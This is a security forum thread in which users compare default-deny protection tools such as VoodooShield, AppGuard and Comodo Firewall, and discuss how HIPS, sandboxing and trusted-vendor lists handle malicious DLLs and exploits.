Which default/deny solution wins, and why?

shmu26

shmu26

Level 85
Thread author
Verified
Honorary Member
Top Poster
Content Creator
Well-known
Jul 3, 2015
8,153
please state why you made your choice. there is a bit of mystery surrounding some of these apps; let's put it on the table for all to see. Facts, not fables.

I deliberately left AppGuard off the list because it is in a class all by itself.
 
  • Like
Reactions: Sunshine-boy, Andy Ful, shukla44 and 9 others
Sort by date Sort by votes
Rengar

Rengar

Level 17
Verified
Top Poster
Well-known
Jan 6, 2017
835
Umbra said:
google it, or go to their respective forums , don't wait people do it or you...
Click to expand...
ANSWER:Whats the reason to google it when you have the forum here. With your logic any problem we have or a question, we can google it and find the solution and not ask here. If you dont want to answer something then dont do it, but dont be harsh:p
 
Last edited by a moderator:
  • Like
Reactions: kylprq, Solarlynx, Andy Ful and 4 others
Upvote 0 Downvote
jerzy601

jerzy601

Level 21
Verified
Top Poster
Well-known
Jun 20, 2011
1,005
my voice on VoodooShield is really good, lightweight and relatively simple operation, I am pleased with his work eateth very well cooperates already installed antywirusami.
I currently have VoodooShield + Eset Internet security work together very well.
As a very good program is AppGuard that some time ago I was using and I was happy with it, but I wanted to try VS and so already left. some time back to AppGuard and then you will not need antivirus.
 
  • Like
Reactions: _CyberGhosT_, Solarlynx, Andy Ful and 2 others
Upvote 0 Downvote
shmu26

shmu26

Level 85
Thread author
Verified
Honorary Member
Top Poster
Content Creator
Well-known
Jul 3, 2015
8,153
Umbra said:
Comodo is an HIPS + isolation using kernel hooks , what inner other working knowledge you need?
Click to expand...
1 what does HIPS do when you have it disabled? Comodo experts say it still functions in the background, but don't detail it. This is an important issue for those following the famous CS non-HIPS config.
2 what protections does HIPS provide for trusted processes? This is relevant to loading of rogue DLLs, and memory exploits.
 
  • Like
Reactions: Deleted member 2913, Solarlynx, Andy Ful and 1 other person
Upvote 0 Downvote
cruelsister

cruelsister

Level 43
Verified
Honorary Member
Top Poster
Content Creator
Well-known
Apr 13, 2013
3,224
Wow! Three of the best applications have been named as the favorites!

1). VS is a really clever program, and I love the fact that whenever it is confused (like with a true zero-day or if network connection is lost) it will suggest running it in isolation. This function really is genius!

2). AppGuard- (God forbid if I badmouthed it with Umbra around)- this program, especially in Lockdown mode makes it difficult, if not impossible, to become infected UNLESS the user allows something that shouldn't be allowed. But I suppose that would be true with anything.

3). CF- Of course the best of the lot. Although CF often has been accused of being a "Geek Only" security application, one of these days (soon) I will provide a setup that even a Man can use without taxing their little brains.

U- I thought you already had a million...

M
 
  • Like
  • HaHa
Reactions: kylprq, LuciusHaydn, Solarlynx and 14 others
Upvote 0 Downvote
D

Deleted member 178

shmu26 said:
1 what does HIPS do when you have it disabled? Comodo experts say it still functions in the background, but don't detail it. This is an important issue for those following the famous CS non-HIPS config.
2 what protections does HIPS provide for trusted processes? This is relevant to loading of rogue DLLs, and memory exploits.
Click to expand...

1- HIPS is never disabled , it is on quiet mode and kicks-in until the BB/sandbox do nothing. read my thread : Comodo Internet Security's auto-Sandbox (BB) & HIPS interaction explanation
2- my other thread : Comodo's Myths & Facts

note that almost all infos about comodo are available here, even more detailed and neutral than in Comodo forum :p
 
  • Like
Reactions: Solarlynx, Andy Ful, Deleted Member 3a5v73x and 3 others
Upvote 0 Downvote
D

Deleted member 178

cruelsister said:
Wow! Three of the best applications have been named as the favorites!

1). VS is a really clever program, and I love the fact that whenever it is confused (like with a true zero-day or if network connection is lost) it will suggest running it in isolation. This function really is genius!
Click to expand...
i always forgot this Cuckoo thingy :D

2). AppGuard- (God forbid if I badmouthed it with Umbra around)- this program, especially in Lockdown mode makes it difficult, if not impossible, to become infected UNLESS the user allows something that shouldn't be allowed. But I suppose that would be true with anything.
Click to expand...
Indeed be careful or a sexist comment will fall like the hammer f Thor :p

3). CF- Of course the best of the lot. Although CF often has been accused of being a "Geek Only" security application, one of these days (soon) I will provide a setup that even a Man can use without taxing their little brains.
Click to expand...
i think many we use it :D

U- I thought you already had a million...
Click to expand...
not yet , i try restrict myself to common human standard :D
 
  • Like
Reactions: Solarlynx, Andy Ful, Deleted Member 3a5v73x and 4 others
Upvote 0 Downvote
S

Sr. Normal 2.0

VS here! :) . This Man is more comfortable with VS than with CF ;)

No, seriously, I do not like to trust the security of my computer to a single program, that's why I have VS, to support / complement my firewall (ZoneAlarm or Norton)

Of the list is the one that I have used more time. I also used in past Comodo Firewall ,but although I recognize its quality, I do not like it.
 
  • Like
Reactions: Deleted member 2913, Solarlynx, Andy Ful and 5 others
Upvote 0 Downvote
cruelsister

cruelsister

Level 43
Verified
Honorary Member
Top Poster
Content Creator
Well-known
Apr 13, 2013
3,224
Umbra on the parallel thread brought up an excellent point about Trusted Vendors. AppGuard has about 8 (someone refresh my memory if that number is not accurate- but I know it is close) whereas Comodo has about 8000 (I KNOW that number is wrong, but it is lots and lots). Although an extensive Trusted Vendor list is a potential issue for malware using a false certificate, this list can be customized in Comodo to make it identical to that of AppGuard (of course I have a video for that).

Shmu- regarding how CF handles dll's- Dropping and registering malicious dll's is a popular attack vector, especially for RAT's. With Comodo at my settings the drop will be recognized and the dll will be isolated from the rest of the system. Either by a sandbox reset or a system reboot and it will be wiped out. As within the next month I'll be publishing a CF for Babies video I'll be sure to include malware of this type to demonstrate.

And screw the HIPS, btw...
 
Last edited:
  • Like
Reactions: kylprq, Sunshine-boy, Solarlynx and 12 others
Upvote 0 Downvote
shmu26

shmu26

Level 85
Thread author
Verified
Honorary Member
Top Poster
Content Creator
Well-known
Jul 3, 2015
8,153
cruelsister said:
Shmu- regarding how CF handles dll's- Dropping and registering malicious dll's is a popular attack vector, especially for RAT's. With Comodo at my settings the drop will be recognized and the dll will be isolated from the rest of the system.
Click to expand...
Hi there CS, in your videos, where you run a malware file on your desktop, the dlls will be isolated because a sandboxed process is spawning them.
but the scenario we were discussing is where an app is exploited and a native script interpreter is used to download the dll. That's trickier to block.
 
  • Like
Reactions: Deleted member 2913, Andy Ful and SHvFl
Upvote 0 Downvote
D

Deleted member 178

shmu26 said:
Hi there CS, in your videos, where you run a malware file on your desktop, the dlls will be isolated because a sandboxed process is spawning them.
but the scenario we were discussing is where an app is exploited and a native script interpreter is used to download the dll. That's trickier to block.
Click to expand...
Use the HIPS :p (CS will kill me lol)
 
  • Like
Reactions: SHvFl and shmu26
Upvote 0 Downvote
shmu26

shmu26

Level 85
Thread author
Verified
Honorary Member
Top Poster
Content Creator
Well-known
Jul 3, 2015
8,153
Umbra said:
Use the HIPS :p (CS will kill me lol)
Click to expand...
tried to do that yesterday, but CFW trashed my browser. It would not let chrome load my profile. I installed CFW, right away put it in proactive mode, and boom, chrome is broken.
30 hours later, and 0 replies on comodo help forum.
any ideas what to do?
 
  • Like
Reactions: Deleted member 2913, Andy Ful and SHvFl
Upvote 0 Downvote
SHvFl

SHvFl

Level 35
Verified
Honorary Member
Top Poster
Content Creator
Well-known
Nov 19, 2014
2,350
shmu26 said:
tried to do that yesterday, but CFW trashed my browser. It would not let chrome load my profile. I installed CFW, right away put it in proactive mode, and boom, chrome is broken.
30 hours later, and 0 replies on comodo help forum.
any ideas what to do?
Click to expand...
Stop using Comodo products because the support is terrible every single time?
 
  • Like
  • Sad
Reactions: kylprq, Sunshine-boy, _CyberGhosT_ and 4 others
Upvote -1 Downvote
W

Wave

Umbra said:
isolation using kernel hooks
Click to expand...
Since they work with real virtualization (e.g. you will need virtualization to be enabled via the BIOS, the hardware must support the virtualize functionality which processor manufacturers integrate, such as Intel VT-x and AMD SVM) they do not need to worry about PatchGuard; they'll be able to use kernel-mode patching techniques such as MSR hooks. Kaspersky use real virtualization also, they implement features like screenshot protection through usage of the hyper-visor... It also allows them to prevent a GDI+ exploit due to win32k.sys, which others vendors cannot do.
 
  • Like
Reactions: Deleted Member 3a5v73x, _CyberGhosT_, Sr. Normal 2.0 and 2 others
Upvote 0 Downvote
You must log in or register to reply here.

Similar threads

SpyNetGirl
    • Like
    • Applause
    • Thanks
Serious Discussion Why do you use obsolete security technologies such as SRP?
Replies
7
Views
1,140
General Security Discussions
Andy Ful
Andy Ful
Victor M
    • +Reputation
    • Like
    • Hundred Points
  • Suggestion
Setup Idea Default Deny Windows Firewall setup How To
Replies
7
Views
3,276
PC Setup Ideas
Victor M
Victor M
oldschool
    • +Reputation
    • Like
    • Applause
Privacy News Ghostery’s CEO says regulation won’t save us from ad trackers
Replies
8
Views
3,012
Security News
bazang
bazang

About us

  • MalwareTips is a community-driven platform providing the latest information and resources on malware and cyber threats. Our team of experienced professionals and passionate volunteers work to keep the internet safe and secure. We provide accurate, up-to-date information and strive to build a strong and supportive community dedicated to cybersecurity.

Quick Navigation

Forum Rules Warning System Welcome Guide Two-factor Authentication

User Menu

Login

Follow us

Follow us on Facebook or Twitter to know first about the latest cybersecurity incidents and malware threats.

Top